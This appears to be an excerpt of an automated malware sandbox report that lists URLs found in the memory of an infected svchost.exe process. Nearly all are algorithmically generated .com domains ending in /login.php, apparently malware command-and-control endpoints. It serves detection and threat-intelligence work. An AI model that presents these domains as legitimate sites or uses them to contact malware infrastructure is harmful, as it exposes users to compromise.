Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydyb.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfow.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyz.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynaz.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypus.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypus.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqub.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyruh.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvuh.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996165263.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydoz.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydyw.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/H
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/http://puzygyl.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602250771.0000000006674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypob.com/
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvuz.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2022281788.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzeb.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzus.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021041342.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2016992308.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020592252.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhab.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhuh.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083716272.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078402402.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088531280.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086240326.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysen.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvar.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvuj.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywyj.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxun.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfax.com/http://lykyfax.com/http://pupypil.com/http://qedyxuq.com/http://qedyxuq.com/Xvj
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfud.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygaj.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796738953.00000000066C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793490988.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793720143.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796578932.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793490988.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793720143.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796578932.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymox.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/login.php
